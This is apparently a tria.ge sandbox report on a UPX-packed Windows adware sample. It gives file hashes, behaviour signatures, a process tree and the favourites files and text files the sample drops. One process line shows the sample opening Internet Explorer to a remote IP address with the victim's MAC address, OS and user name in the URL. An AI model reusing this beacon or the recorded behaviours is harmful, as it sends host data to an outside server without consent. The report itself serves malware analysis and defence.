Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

5

Static

static

5

37ec7faddc...18.exe

windows7-x64

5

37ec7faddc...18.exe

windows10-2004-x64

5

Analysis

  • max time kernel
    94s
  • max time network
    114s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/10/2024, 02:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    37ec7faddc4632a4b0048eaaaf249942_JaffaCakes118.exe

  • Size

    38KB

  • MD5

    37ec7faddc4632a4b0048eaaaf249942

  • SHA1

    e5f2c09f645aa79e46e353019d7e9cee8f3a88ef

  • SHA256

    0ab2fc6fbd11131e49f691636897d96f0c8bb258468cbba4eee0bbc763bcbc5c

  • SHA512

    a02daa33c4f09d3643c43d06e573f8b5df44fef9178490b8d570884d360f6e396e4d2deaf91775fa7dc9461d4737e478cadf5ee535ab03614961b04e927aafe7

  • SSDEEP

    768:ZYNpHbK4UUmY6sr8GURsPh5/KH703mM9k0SXJ25k/PL2mmpLZkPsu:Zip9UUAsfI4h5/Kb0r9Q05ij4LaZ

Score
5/10
discoveryupx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 41 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\37ec7faddc4632a4b0048eaaaf249942_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\37ec7faddc4632a4b0048eaaaf249942_JaffaCakes118.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious use of WriteProcessMemory
    PID:3372
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=d2-bd-7e-71-da-05&os=Microsoft Windows XP&flag=4355e261478ce5cd6827783d4d9fec2e&user=37ec7faddc4632a4b0048eaaaf249942_JaffaCakes118
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3156
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3156 CREDAT:17410 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1576

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TRPPE7V2\suggestions[1].en-US
    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

    Download Submit

  • C:\Users\Admin\Favorites\45575.comÔÚÏßµÄСÓÎÏ·.×îºÃÍæ×îÐÂ×î¿ì¿á³¬¼¶Ð¡ÓÎÏ·!.html
    Filesize

    259B

    MD5

    9eb23c46d269c9debb4345e011e07a4c

    SHA1

    1af312d49b19680ba9776e003aced6602937900f

    SHA256

    f6711066243605d4efa6c1015a4dab4d4e57063a2b84513b665d795bd572c047

    SHA512

    d39d84d0b2b0d9ec520aecbb5dcf26b5b7809048bc895c20c503ac370127f4d56af50ff525843b3bc31f1eef22c6bdae9c672a81b8591f9d1350e343c881ef23

    Download Submit

  • C:\Users\Admin\Favorites\°¬³ÈÅ®×°--×îÃÀÀöʱÉеÄÅ®×°Æ·ÅÆ.ÃÀÅ®ÂòÒ£¬Ãëɱ°¬³ÈÅ®×°!!.html
    Filesize

    261B

    MD5

    7bd1b88f31a6da5622837b47f26c9d3a

    SHA1

    8dfae3dcb5c0e295aa1d1b273af830e4f54d3d10

    SHA256

    6e3a41335a892b2dd58ede098db183b04e58a95b44c51e5de96fa07de0d02085

    SHA512

    8347d358c0157a57958242938c3e844f050b5a7e77d14ae1f7a99a6508766160b8e59bb5a94c5993d5a4c9ea901b1988c35648c9b8fd447589684f599b6ff443

    Download Submit

  • C:\Users\Admin\Favorites\µ±µ±Íø¡ªÍøÉϹºÎïÖÐÐÄ.html
    Filesize

    261B

    MD5

    0d4670b01f65bc72dbf1af3b36ef4f2d

    SHA1

    97553344d494e9b52990d3e1de18db8d1bbc8744

    SHA256

    306a437106117981a9b66c57946da8388998cda83870657b63b0858e8ae12d39

    SHA512

    217d351fa2416443f180efc75ee6306da701a5feae1ad779bbb57682e314b7a310ad0db27f2e0815c936713bbe816086a3d1bbdc9d48cc08afc8d33f0b5702b6

    Download Submit

  • C:\Users\Admin\Favorites\¿´¿´µçÊÓ¾çÔÚÏß´óÈ«,,,×îºÃÂÌÉ«×îиßËÙÃâ·ÑµçÊÓ¾çÍøÕ¾!.html
    Filesize

    266B

    MD5

    c81a8562bf7c8401b8052977fe6e802a

    SHA1

    e54c0e0b91d5a861b20548d30a2ffd350abfac09

    SHA256

    8d101ea02c9bce0d4d091b247546d4caccd887752b6f4c3b44a0f8956c303fda

    SHA512

    f9c855217976830f76a42561ddb181cbc8879a0327db7940715d3e377dd047dbd9c0852c68751dfd9a6e2f564f10338820c02c98f73ffc0a5ed9dd50fc1652cb

    Download Submit

  • C:\Users\Admin\Favorites\ÃÀÅ®·áÐØ´óÃؾ÷-20ÌìÄÚѸËÙÔö´ó´ó´ó!.html
    Filesize

    271B

    MD5

    e5c8bb1ba6bc6de3d4ddac2f0bf47e7d

    SHA1

    70900371edfcdcb01b063e731e56d129369c64a8

    SHA256

    334812944df9a9938b114b7ec02177c4bdb6cbb8dd362ea43d119a37feb2062f

    SHA512

    c3635728cb6e5327276220b57bab8c6068b50130250f8151c06134f17e143067feb04e2f47cecf6fca0d6c046325012492c67d3837ea3e57a516e0b7c4408769

    Download Submit

  • C:\Users\Admin\Favorites\ÌÔ±¦Íø - ÌÔ£¡ÎÒϲ»¶.html
    Filesize

    261B

    MD5

    c6140fc6cd1250bd67a4a22d7c74ec54

    SHA1

    d8371058038d78bd6d5dd8c13bafa21d236cf3e7

    SHA256

    a18fe5781913c54cf547f8bed109aa7de0961189bc7ee91e0a1851b6ca9d0610

    SHA512

    aa50040890a99db0d083674297f19c23f083934bbcc4eb30ee1ec358aa4418e2b017d2bd4314e9ed9d115e710637c82899915897118bc47c1e4edac8858cd3f7

    Download Submit

  • C:\Users\Admin\Favorites\Öйú¸£Àû²ÊƱ£¬ÌåÓý²ÊƱµÄͶעÖÐÐÄ.²ÊƱ´óÓ®¼Ò£¡.html
    Filesize

    261B

    MD5

    1dd93ff89bb660ccd77ec626a0cd052a

    SHA1

    b895b52dc80ac06edf398e538d1b82ae88df554a

    SHA256

    13aa3b6e21889b5f35f27aed509a62deea1c40de9cf1f9730328157dc00d8c9e

    SHA512

    254e5f9db48ccb6f293beb7865f21449bcdc151fed0f6b5dafba7dc7e52ac5829a50af3132c46832ad68f20e9d2b6f64c7b973a79b09e1b4d601033ae99e375e

    Download Submit

  • C:\Users\Admin\Favorites\׿ԽÑÇÂíÑ·ÍøÉϹºÎïͼÊ飬ÊÖ»ú£¬ÊýÂ룬¼Òµç£¬»¯×±Æ·£¬ÖÓ±í£¬Ê×ÊεÈÔÚÏßÏúÊÛ.html
    Filesize

    261B

    MD5

    8c9d533856807659bd89d3a99b1bedfc

    SHA1

    a55b51b5f91bea060463db9266dd6dbbc1de6ef5

    SHA256

    dd59719dc8255bddc6dcb6f54e27ab82b8f0285280379c8a90d5043d657f16fa

    SHA512

    2d8bb0fae1e09094b7e08b0c4dea5e4b9cf97cbf25638df1a7db14b113e6ab8a95f160a7ada024700f048962c2baf7bf963d16b783a45b83d1d20399cc81d158

    Download Submit

  • C:\Users\Admin\Favorites\×îÐÂÔÚÏßС˵Ãâ·ÑµÄÔĶÁ.·á¸»ÄÚÈÝËٶȿìµÄС˵վ!.html
    Filesize

    264B

    MD5

    428d1e753132e1fe27a06715e484ecc8

    SHA1

    62bd82694da83f087052c2cb6a8de923628f02a1

    SHA256

    42ca671a0639af6857bfe9716d48aa978210a66d98948a978066e1df90ad4377

    SHA512

    c21a1473639acc7f1c9f7847d0442d4ee5cbfa09d121f3024163af63a70968620bd16b56ccbca6dcb6447c4d01fb9df9dc5482ed29b38984a64afb39aadad317

    Download Submit

  • C:\b.txt
    Filesize

    264B

    MD5

    ee765b1ebea1c25ae9e7f3ce73841c46

    SHA1

    9a729deb3d211e8bbb0198bb5e7f436056293331

    SHA256

    2013251dc3e77710d417cc8c51fdcaa3d9e4ec7c019c55020994130639f87f65

    SHA512

    5cf9a564be444151dcc8cf960aee916bbd7c21874e98a0a594d2e40e5861bdbf2cac37d8da7c30b564529600c948feefd8eda45a0bd5e55e5d5b75fe9ac84434

    Download Submit

  • C:\b.txt
    Filesize

    264B

    MD5

    add868ad632bae3c8463dc0ec229b378

    SHA1

    15b54006e86a836aebb91c13bef87fda2d48d90e

    SHA256

    7c72e4241e5954f020dab760d37fb8410edb68e250ceaf2ae4d67e34d91500b0

    SHA512

    7b483f5974e0f583810a8a9d4a98362f5f95a4726ab02f7e0518345b6614a8c97d28b34a3a979ce1866fa47eff1d7d39d85521400fbe1867315795f362b3b4df

    Download Submit

  • C:\b.txt
    Filesize

    262B

    MD5

    611686eef0addaaaca3174ce3f441ac7

    SHA1

    e8679a8b1065f449099a8bae3a8b648bab8e4bc4

    SHA256

    0e4275d4a43d84f18bb574bcb4519aa059acf84994cfa5681fe14b168d541e6d

    SHA512

    8d1d4570e1367b9030f84cc1a1fde70d7e6c0ab4ef464405b9c09b4028c26fb58a7155c4a408031a72b936856f0f0ac6fd6fd7072f2b900edc821537f8328e1f

    Download Submit

  • C:\b.txt
    Filesize

    264B

    MD5

    878778e6ae273c74668c90ff5fc48431

    SHA1

    b85a0b7416e86c8f485be4b6c349f0ab426bc5b3

    SHA256

    119d16ac01b447b28a850c44efe9ef52f38ca8b1f9702404451fa7bfa85264c2

    SHA512

    936ae49cac20a0ec4ad87a06f4d55f629341c8713768f52ccc111a95272c7feae5614d897d2df6077b203d1d5c150b6375d1fefc9d8383daf104996501269c09

    Download Submit

  • C:\b.txt
    Filesize

    3KB

    MD5

    ca0294359fd9a7a27616a18c22dbd68a

    SHA1

    12aa0ef1265d0bfe5b3dd60f8aa8b71708f34104

    SHA256

    af5fc76f77e480486e0592397a6a3d22fa750eef1d20e4d5fe54937879096286

    SHA512

    8b5e93b96e3ef5da76db8f0b3bc841151fe868e71ba37cb17a3b4aea7945118983b18988e53d8b498c9a539ad982e1e9b41b5c4117d223246bc44119a8475621

    Download Submit

  • memory/3372-0-0x0000000000400000-0x0000000000421000-memory.dmp

    Filesize

    132KB

    Download

  • memory/3372-93-0x0000000000400000-0x0000000000421000-memory.dmp

    Filesize

    132KB

    Download